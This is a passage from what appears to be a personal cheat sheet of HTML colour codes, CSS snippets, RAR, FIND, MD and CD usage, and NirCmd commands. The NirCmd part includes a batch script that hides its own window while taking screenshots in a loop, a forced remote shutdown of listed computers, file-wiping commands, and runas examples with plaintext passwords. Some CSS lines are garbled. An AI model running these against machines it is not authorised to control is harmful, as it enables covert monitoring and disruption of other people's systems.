  589. [HTML] HoneyDew(#F0FFF0);HotPink(#FF69B4);IndianRed(#CD5C5C);Indigo(#4B0082);Ivory(#FFFFF0);
  590. [HTML] Khaki(#F0E68C);Lavender(#E6E6FA);LavenderBlush(#FFF0F5);LawnGreen(#7CFC00);
  591. [HTML] LemonChiffon(#FFFACD);LightBlue(#ADD8E6);LightCoral(#F08080);LightCyan(#E0FFFF);
  592. [HTML] LightGoldenRodYellow(#FAFAD2);LightGray(#D3D3D3);LightGreen(#90EE90);LightPink(#FFB6C1);
  593. [HTML] LightSalmon(#FFA07A);LightSeaGreen(#20B2AA);LightSkyBlue(#87CEFA);LightSlateGray(#778899);
  594. [HTML] LightSteelBlue(#B0C4DE);LightYellow(#FFFFE0);Lime(#00FF00);LimeGreen(#32CD32);
  595. [HTML] Linen(#FAF0E6);Magenta(#FF00FF);Maroon(#800000);MediumAquaMarine(#66CDAA);
  596. [HTML] MediumBlue(#0000CD);MediumOrchid(#BA55D3);MediumPurple(#9370DB);MediumSeaGreen(#3CB371);
  597. [HTML] MediumSlateBlue(#7B68EE);MediumSpringGreen(#00FA9A);MediumTurquoise(#48D1CC);
  598. [HTML] MediumVioletRed(#C71585);MidnightBlue(#191970);MintCream(#F5FFFA);MistyRose(#FFE4E1);
  599. [HTML] Moccasin(#FFE4B5);NavajoWhite(#FFDEAD);Navy(#000080);OldLace(#FDF5E6);Olive(#808000);
  600. [HTML] OliveDrab(#6B8E23);Orange(#FFA500);OrangeRed(#FF4500);Orchid(#DA70D6);PaleGoldenRod(#EEE8AA);
  601. [HTML] PaleGreen(#98FB98);PaleTurquoise(#AFEEEE);PaleVioletRed(#DB7093);PapayaWhip(#FFEFD5);
  602. [HTML] PeachPuff(#FFDAB9);Peru(#CD853F);Pink(#FFC0CB);Plum(#DDA0DD);PowderBlue(#B0E0E6);
  603. [HTML] Purple(#800080);RebeccaPurple(#663399);Red(#FF0000);RosyBrown(#BC8F8F);RoyalBlue(#4169E1);
  604. [HTML] SaddleBrown(#8B4513);Salmon(#FA8072);SandyBrown(#F4A460);SeaGreen(#2E8B57);SeaShell(#FFF5EE);
  605. [HTML] Sienna(#A0522D);Silver(#C0C0C0);SkyBlue(#87CEEB);SlateBlue(#6A5ACD);SlateGray(#708090);
  606. [HTML] SlateGrey(#708090);Snow(#FFFAFA);SpringGreen(#00FF7F);SteelBlue(#4682B4);Tan(#D2B48C);
  607. [HTML] Teal(#008080);Thistle(#D8BFD8);Tomato(#FF6347);Turquoise(#40E0D0);Violet(#EE82EE);
  608. [HTML] Wheat(#F5DEB3);White(#FFFFFF);WhiteSmoke(#F5F5F5);Yellow(#FFFF00);YellowGreen(#9ACD32);
  609. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  610. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  611. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  612. [CSS] <link rel="stylesheet" href="https://www.w3schools.com/html/styles.css">
  613. [CSS] <link rel="stylesheet" href="styles.css">
  614. [CSS] /* This is a single-line comment */
  615. [CSS] /* This is
  616. [CSS] a multi-line
  617. [CSS] comment */
  618. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Audiowide">
  619. [CSS] <style>
  620. [CSS] body {font-family: "Audiowide", sans-serif;}
  621. [CSS] h1.a {font-family: "Audiowide", sans-serif;}
  622. [CSS] h1.b {font-family: "Sofia", sans-serif;}
  623. [CSS] h1.c {font-family: "Trirong", serif;}
  624. [CSS] body {
  625. [CSS] font-family: "Sofia", sans-serif;
  626. [CSS] font-size: 30px;
  627. [CSS] text-shadow: 3px 3px 3px #ababab;
  628. [CSS] }
  629. [CSS] </style>
  630. [CSS] <style>
  631. [CSS] body {
  632. [CSS] font-family: "Sofia", sans-serif;
  633. [CSS] font-size: 30px;
  634. [CSS] }
  635. [CSS] </style>
  636. [CSS] </head>
  637. [CSS] <body>
  638. [CSS] <h1 class="font-effect-fire">Sofia on Fire</h1>
  639. [CSS] </body>
  640. [CSS] <head>
  641. [CSS] <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Sofia&effect=neon|outline|emboss|shadow-multiple">
  642. [CSS] <style>
  643. [CSS] body {
  644. [CSS] font-family: "Sofia", sans-serif;
  645. [CSS] font-size: 30px;
  646. [CSS] }
  647. [CSS] </style>
  648. [CSS] </head>
  649. [CSS] <body>
  650. [CSS] <h1 class="font-effect-neon">Neon Effect</h1>
  651. [CSS] <h1 class="font-effect-outline">Outline Effect</h1>
  652. [CSS] <h1 class="font-effect-emboss">Emboss Effect</h1>
  653. [CSS] <h1 class="font-effect-shadow-multiple">Multiple Shadow Effect</h1>
  654. [CSS] </body>
  655. [CSS] -------------------------------------------------------------
  656. [CSS] 1 Use the HTML style attribute for inline styling
  657. [CSS] <h1 style="color:blue;text-align:center;">Text</h1>
  658. [CSS] <p style="color:red;">This is a paragraph.</p>
  659. [CSS] 2 Use the HTML <style> element to define internal CSS
  660. [CSS] 3 Use the HTML <link> element to refer to an external CSS file
  661. [CSS] 4 Use the HTML <head> element to store <style> and <link> elements
  662. [CSS] 5 Use the CSS color property for text colors
  663. [CSS] 6 Use the CSS font-family property for text fonts
  664. [CSS] 7 Use the CSS font-size property for text sizes
  665. [CSS] 8 Use the CSS border property for borders
  666. [CSS] 9 Use the CSS padding property for space inside the border
  667. [CSS] 10 Use the CSS margin property for space outside the border
  668. [CSS] ----------------------------------------------------------------
  669. [CSS] "styles.css":
  670. [CSS] body {
  671. [CSS] background-color: powderblue;
  672. [CSS] background-image: url("paper.gif");
  673. [CSS] background-image: url("bgdesert.jpg");
  674. [CSS] background-repeat: repeat-x; repeat-y; no-repeat;
  675. [CSS] background-position: right top;
  676. [CSS] background-attachment: fixed; scroll;
  677. [CSS] }
  678. [CSS] body {
  679. [CSS] background: #ffffff url("img_tree.png") no-repeat right top;
  680. [CSS] }
  681. [CSS] h1 {
  682. [CSS] background-color: green;
  683. [CSS] opacity: 0.3; 1; 0.6;
  684. [CSS] background-image: url("bgdesert.jpg");
  685. [CSS] color: blue; /* Set text color to blue */
  686. [CSS] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  687. [CSS] font-style: normal; italic; oblique;
  688. [CSS] font: italic small-caps bold 12px/30px Georgia, serif;
  689. [CSS] font-weight: normal; bold;
  690. [CSS] font-variant: normal; small-caps;
  691. [CSS] font-size: 300%; 40px; 14px; 10vw; OR font-size: 2.5em; /* 40px/16=2.5em */
  692. [CSS] margin-left: 20px;
  693. [CSS] text-align: center; left; right; justify;
  694. [CSS] text-decoration: none; overline; line-through; underline;
  695. [CSS] text-transform: uppercase; lowercase; capitalize;
  696. [CSS] text-indent: 50px;
  697. [CSS] letter-spacing: 5px; -2px;
  698. [CSS] line-height: 0.8; 1.8;
  699. [CSS] word-spacing: 10px;-2px;
  700. [CSS] white-space: nowrap;
  701. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  702. [CSS] }
  703. [CSS] p {
  704. [CSS] background-color: yellow;
  705. [CSS] opacity: 0.3; 1; 0.6;
  706. [CSS] background-image: url("bgdesert.jpg");
  707. [CSS] color: red; white;
  708. [CSS] font-family: courier; verdana;
  709. [CSS] font-size: 160%; 20px;
  710. [CSS] border: 2px solid powderblue;
  711. [CSS] padding: 30px; OR margin: 50px;
  712. [CSS] text-align: center; left; right; justify;
  713. [CSS] text-decoration: none; overline; line-through; underline;
  714. [CSS] text-transform: uppercase; lowercase; capitalize;
  715. [CSS] text-indent: 50px;
  716. [CSS] letter-spacing: 5px; -2px;
  717. [CSS] line-height: 0.8; 1.8;
  718. [CSS] word-spacing: 10px;-2px;
  719. [CSS] white-space: nowrap;
  720. [CSS] text-shadow: 2px 2px 5px red; OR text-shadow: 2px 2px red;
  721. [CSS] }
  722. [CSS] The CSS rule below will be applied to the HTML element with id="para1":
  723. [CSS] #para1 {
  724. [CSS] text-align: center;
  725. [CSS] color: red;
  726. [CSS] }
  727. [CSS] In this example all HTML elements with class="center" will be red and center-aligned:
  728. [CSS] .center {
  729. [CSS] text-align: center;
  730. [CSS] color: red;
  731. [CSS] }
  732. [CSS] div {
  733. [CSS] background-color: green;
  734. [CSS] opacity: 0.3; 1; 0.6;
  735. [CSS] }
  736. [CSS] In this example only <p> elements with class="center" will be red and center-aligned:
  737. [CSS] p.center {
  738. [CSS] text-align: center;
  739. [CSS] color: red;
  740. [CSS] } ; <p class="center large">This paragraph refers to two classes.</p>
  741. [CSS] * {
  742. [CSS] text-align: center;
  743. [CSS] color: blue;
  744. [CSS] }
  745. [CSS] h1, h2, p {
  746. [CSS] text-align: center;
  747. [CSS] color: red;
  748. [CSS] }
  749. [CSS] p.dotted {border-style: dotted;}
  750. [CSS] p.dashed {border-style: dashed;}
  751. [CSS] p.solid {border-style: solid;}
  752. [CSS] p.double {border-style: double;}
  753. [CSS] p.groove {border-style: groove;}
  754. [CSS] p.ridge {border-style: ridge;}
  755. [CSS] p.inset {border-style: inset;}
  756. [CSS] p.outset {border-style: outset;}
  757. [CSS] p.none {border-style: none;}
  758. [CSS] p.hidden {border-style: hidden;}
  759. [CSS] p.mix {border-style: dotted dashed solid double;}
  760. [CSS] p.one {
  761. [CSS] border-radius: 5px;
  762. [CSS] border-color: red;
  763. [CSS] border-style: solid;
  764. [CSS] border-width: 5px;
  765. [CSS] border-width: 5px 20px; /* 5px top and bottom, 20px on the sides */
  766. [CSS] }
  767. [CSS] p.two {
  768. [CSS] border-radius: 5px;
  769. [CSS] border-color: red;
  770. [CSS] border-style: solid;
  771. [CSS] border-width: medium;
  772. [CSS] border-width: 20px 5px; /* 20px top and bottom, 5px on the sides */
  773. [CSS] }
  774. [CSS] p.three {
  775. [CSS] border-radius: 5px;
  776. [CSS] border-color: red;
  777. [CSS] border-style: dotted;
  778. [CSS] border-width: 2px;
  779. [CSS] border-width: 25px 10px 4px 35px; /* 25px top, 10px right, 4px bottom and 35px left */
  780. [CSS] }
  781. [CSS] p.four {
  782. [CSS] border-style: dotted;
  783. [CSS] border-width: thick;
  784. [CSS] }
  785. [CSS] p {
  786. [CSS] border-top-style: dotted;
  787. [CSS] border-right-style: solid;
  788. [CSS] border-bottom-style: dotted;
  789. [CSS] border-left-style: solid;
  790. [CSS] }
  791. [CSS] p {
  792. [CSS] border: 5px solid red;
  793. [CSS] }
  794. [CSS] p {
  795. [CSS] margin-top: 100px;
  796. [CSS] margin-bottom: 100px;
  797. [CSS] margin-right: 150px;
  798. [CSS] margin-left: 80px;
  799. [CSS] -----------------------
  800. [CSS] margin: 0 0 50px 0;
  801. [CSS] margin: 20px 0 0 0;
  802. [CSS] }
  803. [CSS] div {
  804. [CSS] padding-top: 50px;
  805. [CSS] padding-right: 30px;
  806. [CSS] padding-bottom: 50px;
  807. [CSS] padding-left: 80px;
  808. [CSS] }
  809. [CSS] div {
  810. [CSS] padding: 25px 50px 75px 100px;
  811. [CSS] }
  812. [CSS] div {
  813. [CSS] height: 200px;
  814. [CSS] width: 50%;
  815. [CSS] max-width: 500px; min-width: 500px;
  816. [CSS] max-height: 500px; min-height: 500px;
  817. [CSS] background-color: powderblue;
  818. [CSS] }
  819. [CSS] div {
  820. [CSS] width: 300px;
  821. [CSS] border: 15px solid green;
  822. [CSS] padding: 50px;
  823. [CSS] margin: 20px;
  824. [CSS] }
  825. [CSS] p.dotted {outline-style: dotted;}
  826. [CSS] p.dashed {outline-style: dashed;}
  827. [CSS] p.solid {outline-style: solid;}
  828. [CSS] p.double {outline-style: double;}
  829. [CSS] p.groove {outline-style: groove;}
  830. [CSS] p.ridge {outline-style: ridge;}
  831. [CSS] p.inset {outline-style: inset;}
  832. [CSS] p.outset {outline-style: outset;}
  833. [CSS] /* unvisited link */
  834. [CSS] a:link {
  835. [CSS] color: red;
  836. [CSS] }
  837. [CSS] /* visited link */
  838. [CSS] a:visited {
  839. [CSS] color: green;
  840. [CSS] }
  841. [CSS] /* mouse over link */
  842. [CSS] a:hover {
  843. [CSS] color: hotpink;
  844. [CSS] }
  845. [CSS] /* selected link */
  846. [CSS] a:active {
  847. [CSS] color: blue;
  848. [CSS] }
  849. [CSS] a:link, a:visited {
  850. [CSS] background-color: #f44336;
  851. [CSS] color: white;
  852. [CSS] padding: 14px 25px;
  853. [CSS] text-align: center;
  854. [CSS] text-decoration: none;
  855. [CSS] display: inline-block;
  856. [CSS] }
  857. [CSS] a:hover, a:active {
  858. [CSS] background-color: red;
  859. [CSS] }
  860. [CSS] <span style="cursor: auto">auto</span><br>
  861. [CSS] <span style="cursor: crosshair">crosshair</span><br>
  862. [CSS] <span style="cursor: default">default</span><br>
  863. [CSS] <span style="cursor: e-resize">e-resize</span><br>
  864. [CSS] <span style="cursor: help">help</span><br>
  865. [CSS] <span style="cursor: move">move</span><br>
  866. [CSS] <span style="cursor: n-resize">n-resize</span><br>
  867. [CSS] <span style="cursor: ne-resize">ne-resize</span><br>
  868. [CSS] <span style="cursor: nw-resize">nw-resize</span><br>
  869. [CSS] <span style="cursor: pointer">pointer</span><br>
  870. [CSS] <span style="cursor: progress">progress</span><br>
  871. [CSS] <span style="cursor: s-resize">s-resize</span><br>
  872. [CSS] <span style="cursor: se-resize">se-resize</span><br>
  873. [CSS] <span style="cursor: sw-resize">sw-resize</span><br>
  874. [CSS] <span style="cursor: text">text</span><br>
  875. [CSS] <span style="cursor: w-resize">w-resize</span><br>
  876. [CSS] <span style="cursor: wait">wait</span>
  877. [CSS] ul {
  878. [CSS] list-style: square inside url("sqpurple.gif");
  879. [CSS] }
  880. [CSS] table, th, td {
  881. [CSS] border: 1px solid black;
  882. [CSS] }
  883. [CSS] table {
  884. [CSS] border-collapse: collapse;
  885. [CSS] }
  886. [CSS] table th, td {
  887. [CSS] padding: 15px;
  888. [CSS] text-align: left;
  889. [CSS] border: 1px solid black;
  890. [CSS] }
  891. [CSS] #rcorners1 {
  892. [CSS] border-radius: 25px;
  893. [CSS] background: #73AD21;
  894. [CSS] padding: 20px;
  895. [CSS] width: 200px;
  896. [CSS] height: 150px;
  897. [CSS] }
  898. [CSS] #rcorners2 {
  899. [CSS] border-radius: 25px;
  900. [CSS] border: 2px solid #73AD21;
  901. [CSS] padding: 20px;
  902. [CSS] width: 200px;
  903. [CSS] height: 150px;
  904. [CSS] }
  905. [CSS] #rcorners3 {
  906. [CSS] border-radius: 25px;
  907. [CSS] background: url(paper.gif);
  908. [CSS] background-position: left top;
  909. [CSS] background-repeat: repeat;
  910. [CSS] padding: 20px;
  911. [CSS] width: 200px;
  912. [CSS] height: 150px;
  913. [CSS] }
  914. [CSS] #rcorners1 {
  915. [CSS] border-radius: 15px 50px 30px 5px;
  916. [CSS] background: #73AD21;
  917. [CSS] padding: 20px;
  918. [CSS] width: 200px;
  919. [CSS] height: 150px;
  920. [CSS] }
  921. [CSS] #rcorners2 {
  922. [CSS] border-radius: 15px 50px 30px;
  923. [CSS] background: #73AD21;
  924. [CSS] padding: 20px;
  925. [CSS] width: 200px;
  926. [CSS] height: 150px;
  927. [CSS] }
  928. [CSS] #rcorners3 {
  929. [CSS] border-radius: 15px 50px;
  930. [CSS] background: #73AD21;
  931. [CSS] padding: 20px;
  932. [CSS] width: 200px;
  933. [CSS] height: 150px;
  934. [CSS] }
  935. [CSS] #rcorners4 {
  936. [CSS] border-radius: 15px;
  937. [CSS] background: #73AD21;
  938. [CSS] padding: 20px;
  939. [CSS] width: 200px;
  940. [CSS] height: 150px;
  941. [CSS] }
  942. [CSS] #borderimg {
  943. [CSS] border: 10px solid transparent;
  944. [CSS] padding: 15px;
  945. [CSS] border-image: url(border.png) 30 round;
  946. [CSS] }
  947. [CSS] #borderimg {
  948. [CSS] border: 10px solid transparent;
  949. [CSS] padding: 15px;
  950. [CSS] border-image: url(border.png) 30 stretch;
  951. [CSS] }
  952. [CSS] #example1 {
  953. [CSS] background-image: url(img_flwr.gif), url(paper.gif);
  954. [CSS] background-position: right bottom, left top;
  955. [CSS] background-repeat: no-repeat, repeat;
  956. [CSS] }
  957. [CSS] #div1 {
  958. [CSS] background: url(img_flower.jpg);
  959. [CSS] background-size: 100px 80px;
  960. [CSS] background-repeat: no-repeat;
  961. [CSS] }
  962. [CSS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CSS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  963. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-RAR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  964. [RAR] Usage: RAR <command> -<switch 1> -<switch N> <archive> <files...>
  965. [RAR] <@listfiles...> <path_to_extract\>
  966. [RAR] %WinDir%\RAr.exe a NSK.rar "D:\latest data"
  967. [RAR] %WinDir%\RAr.exe a help *.hlp (add all *.hlp files from the current folder to the archive help.rar)
  968. [RAR] [RAR]%WinDir%\RAr.exe a -r -v362 -s -sfx -rr save
  969. [RAR] %WinDir%\RAr.exe a -pZaBaToAd -r secret games\*.*
  970. [RAR]%WinDir%\RAr.exe a NSK.rar d:\files -p123 -p- -k
  971. [RAR] ----------------------------------------------------------------------
  972. [RAR] Usage: RAR & UNRAR <command> -<switch 1> -<switch N> <archive> <files...>
  973. [RAR] <@listfiles...> <path_to_extract\>
  974. [RAR] %WinDir%\UnRAR.exe x NSK.rar D:\data\
  975.  
  976. [RAR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-RAR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  977. [NIRCMD] :-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  978. [NIRCMD] @ECHO OFF
  979. [NIRCMD] COLOR 1B
  980. [NIRCMD] REM setlocal enabledelayedexpansion
  981. [NIRCMD] set /p "sec=Screen Capture Time PerSec:
  982. [NIRCMD] (
  983. [NIRCMD] nircmd.exe win hide ititle "cmd.exe"
  984. [NIRCMD] :top
  985. [NIRCMD] timeout /t %sec%
  986. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen.jpg"
  987. [NIRCMD] goto top
  988. [NIRCMD] )
  989. [NIRCMD] -------------------------------------------------------------------
  990. [NIRCMD] nircmd.exe savescreenshot "C:\Users\%USERNAME%\Desktop\Screen%%random%%.jpg"
  991. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  992. [NIRCMD] nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  993. [NIRCMD] nircmd.exe filldelete "c:\temp\*.*"
  994. [NIRCMD] nircmd.exe filldelete "c:\temp\myfile.dat"
  995. [NIRCMD] nircmd.exe speak text ~$clipboard$
  996. [NIRCMD] nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  997. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt"
  998. [NIRCMD] nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  999. [NIRCMD] nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  1000. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$loopcount$.png
  1001. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png"
  1002. [NIRCMD] nircmd.exe savescreenshot "c:\temp\shot.png" 50 50 300 200
  1003. [NIRCMD] nircmd.exe savescreenshot *clipboard* 150 150 400 400
  1004. [NIRCMD] nircmd.exe savescreenshotwin "c:\temp\win.png"
  1005. [NIRCMD] nircmd.exe savescreenshotwin *clipboard*
  1006. [NIRCMD] nircmd.exe cmdwait 1000 monitor off
  1007. [NIRCMD] nircmd.exe infobox "This is a message box !" "message"
  1008. [NIRCMD] nircmd.exe folder.appdata
  1009. [NIRCMD] nircmd.exe folder.startup
  1010. [NIRCMD] nircmd.exe beep 500 2000
  1011. [NIRCMD] nircmd.exe wait 1000
  1012. [NIRCMD] nircmd.exe wait 500
  1013. [NIRCMD] nircmd.exe sendkeypress ctrl+shift+esc
  1014. [NIRCMD] nircmd.exe sendkeypress Ctrl+printscreen
  1015. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  1016. [NIRCMD] nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  1017. [NIRCMD] nircmd.exe convertimages "c:\temp\a*.gif" .png
  1018. [NIRCMD] nircmd.exe convertimages "c:\temp\*.jpg" .gif
  1019. [NIRCMD] nircmd.exe emptybin
  1020. [NIRCMD] nircmd.exe speak text ~$clipboard$
  1021. [NIRCMD] nircmd.exe speak file "D:\speak.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  1022. [NIRCMD] nircmd.exe cdrom open j:
  1023. [NIRCMD] nircmd.exe cdrom close y:
  1024. [NIRCMD] nircmd.exe mutesysvolume 1
  1025. [NIRCMD] nircmd.exe mutesysvolume 0
  1026. [NIRCMD] nircmd.exe mutesysvolume 2
  1027. [NIRCMD] nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  1028. [NIRCMD] nircmd.exe changesysvolume 2000
  1029. [NIRCMD] nircmd.exe changesysvolume -5000
  1030. [NIRCMD] nircmd.exe setsysvolume 65535
  1031. [NIRCMD] nircmd.exe monitor off
  1032. [NIRCMD] nircmd.exe screensaver
  1033. [NIRCMD] nircmd.exe exitwin poweroff
  1034. [NIRCMD] nircmd.exe multiremote copy "c:\temp\computers.txt" exitwin poweroff force
  1035. [NIRCMD] nircmd.exe rasdial "My Internet"
  1036. [NIRCMD] nircmd.exe rashangup "My Internet"
  1037. [NIRCMD] nircmd.exe win trans ititle "internet explorer" 192
  1038. [NIRCMD] nircmd.exe win min class "IEFrame"
  1039. [NIRCMD] nircmd.exe win close class "IEFrame"
  1040. [NIRCMD] nircmd.exe win close class "CabinetWClass"
  1041. [NIRCMD] nircmd.exe win hide class "IEFrame"
  1042. [NIRCMD] nircmd.exe win show class "IEFrame"
  1043. [NIRCMD] nircmd.exe win center alltop
  1044. [NIRCMD] nircmd.exe win -style title "my computer" 0x00C00000
  1045. [NIRCMD] nircmd.exe win +style title "my computer" 0x00C00000
  1046. [NIRCMD] nircmd win +exstyle title "my computer" 0x00400000
  1047. [NIRCMD] nircmd win child title "my computer" +exstyle all 0x00400000
  1048. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Close All IE" win close class "IEFrame"
  1049. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Hide All IE" win hide class "IEFrame"
  1050. [NIRCMD] nircmd.exe cmdshortcut " "~$folder.desktop$ "Show All IE" win show class "IEFrame"
  1051. [NIRCMD] nircmd.exe win settopmost title "Calculator" 1
  1052. [NIRCMD] nircmd.exe win settopmost title "Calculator" 0
  1053. [NIRCMD] nircmd.exe shortcut "f:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  1054. [NIRCMD] nircmd.exe win hide class progman
  1055. [NIRCMD] nircmd.exe win show class progman
  1056. [NIRCMD] nircmd.exe killprocess iexplore.exe
  1057. [NIRCMD] nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.desktop$" "NirSoft"
  1058. [NIRCMD] nircmd.exe setdisplay 800 600 24
  1059. [NIRCMD] nircmd.exe execmd copy "~$folder.desktop$\*.lnk" f:\temp\desktop
  1060. [NIRCMD] nircmd regedit "~$clipboard$"
  1061. [NIRCMD] nircmd.exe clipboard set ~$folder.desktop$
  1062. [NIRCMD] nircmd.exe clipboard set ~$folder.start_menu$
  1063. [NIRCMD] nircmd.exe clipboard readfile "c:\My Files\info1.txt"
  1064. [NIRCMD] nircmd.exe clipboard addfile "c:\My Files\info1.txt"
  1065. [NIRCMD] nircmd.exe clipboard clear
  1066. [NIRCMD] nircmd.exe paramsfile "c:\temp\folders.txt" "" "" execmd md ~$fparam.1$
  1067. [NIRCMD] nircmd.exe dlg "" "" click yes
  1068. [NIRCMD] nircmd.exe cmdwait 2000 savescreenshot "f:\temp\shot.png"
  1069. [NIRCMD] nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM_dd_yyyy$-~$currtime.HH_mm_ss$.png
  1070. [NIRCMD] nircmd.exe elevate notepad.exe
  1071. [NIRCMD] nircmd.exe elevate notepad.exe C:\Windows\System32\Drivers\etc\HOSTS
  1072. [NIRCMD] nircmd.exe elevate "c:\program files\my software\abc.exe"
  1073. [NIRCMD] nircmd.exe runas admin1 Password1 "F:\Program Files\Mozilla Firefox\firefox.exe"
  1074. [NIRCMD] nircmd.exe runas Domain01\user01 myp234Jk c:\temp\myprogram.exe
  1075. [NIRCMD] nircmd.exe runas user01@domain.com Nm1923a "c:\temp\myprogram.exe" -a -k
  1076. [NIRCMD] nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  1077. [NIRCMD] nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  1078. [NIRCMD] nircmd.exe trayballoon "Hello" "This is a test..." "shell32.dll,22" 15000
  1079. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon " "shell32.dll,-154" 10000
  1080. [NIRCMD] nircmd.exe runinteractivecmd savescreenshot "c:\temp\screenshot1.png"
  1081. [NIRCMD] nircmd.exe runinteractive c:\windows\system32\taskmgr.exe
  1082. [NIRCMD] nircmd.exe trayballoon "Hello" "This is the text that will be appear inside the balloon \temp\icon1.ico" 10000
  1083. [NIRCMD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NIRCMD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1084. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1085. [FIND] [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[ ...]]
  1086. [FIND] /V Displays all lines NOT containing the specified string.
  1087. [FIND] /C Displays only the count of lines containing the string.
  1088. [FIND] /N Displays line numbers with the displayed lines.
  1089. [FIND] /I Ignores the case of characters when searching for the string.
  1090. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1091. [FIND] "string" Specifies the text string to find.
  1092. [FIND] [drive:][path]filename Specifies a file or files to search.
  1093. [FIND] EXMPLES:- FIND "WORD" *.txt
  1094. [FIND] FIND /V /C "" D:\Samle.txt OR *.txt
  1095. [FIND] FIND /I "WORD" *Files*.txt
  1096. [FIND] FIND /N /I "TEXT" *.txt
  1097. [FIND] TYPE D:\Sample.txt | FIND " /V /C
  1098. [FIND] ----------------------------------------------------
  1099. [FIND] FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file]
  1100. [FIND] [/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]]
  1101. [FIND] strings [[drive:][path]filename[ ...]]
  1102. [FIND] /B Matches pattern if at the beginning of a line.
  1103. [FIND] /E Matches pattern if at the end of a line.
  1104. [FIND] /L Uses search strings literally.
  1105. [FIND] /R Uses search strings as regular expressions.
  1106. [FIND] /S Searches for matching files in the current directory and all
  1107. [FIND] subdirectories.
  1108. [FIND] /I Specifies that the search is not to be case-sensitive.
  1109. [FIND] /X Prints lines that match exactly.
  1110. [FIND] /V Prints only lines that do not contain a match.
  1111. [FIND] /N Prints the line number before each line that matches.
  1112. [FIND] /M Prints only the filename if a file contains a match.
  1113. [FIND] /O Prints character offset before each matching line.
  1114. [FIND] /P Skip files with non-printable characters.
  1115. [FIND] /OFF[LINE] Do not skip files with offline attribute set.
  1116. [FIND] /A:attr Specifies color attribute with two hex digits. See "color / "
  1117. [FIND] /F:file Reads file list from the specified file(/ stands for console).
  1118. [FIND] /C:string Uses specified string as a literal search string.
  1119. [FIND] /G:file Gets search strings from the specified file(/ stands for console).
  1120. [FIND] /D:dir Search a semicolon delimited list of directories
  1121. [FIND] strings Text to be searched for.
  1122. [FIND] [drive:][path]filename Specifies a file or files to search.
  1123. [FIND] EXMPLES:-
  1124. [FIND] FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  1125. [FIND] FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  1126. [FIND] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FIND END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1127. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1128. [MD] MKDIR [drive:]path
  1129. [MD] MD [drive:]path
  1130. [MD] MD test ; md C:\test ; md C:\test ; mkdir \a\b\c
  1131. [MD] MD user1 user2 user3 ; md "my example directory"
  1132. [MD] MD ..\example
  1133. [MD] echo "Hello">C:\new.txt
  1134. [MD] echo. 2>EmptyFile.txt
  1135. [MD] type 2>EmptyFile.txt
  1136. [MD] type. 2>EmptyFile.txt
  1137. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1138. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1139. [CD] CD [/D] [drive:][path]
  1140. [CD] CD
  1141. [CD] CD\Program Files
  1142. [CD] CD %USERPROFILE%
  1143. [CD] CD..
  1144. [CD] CD..\..
  1145. [CD] CD\
  1146. [CD] CD\Windows
  1147. [CD] CD\windows\system32
  1148. [CD] CD /d E:\Pics
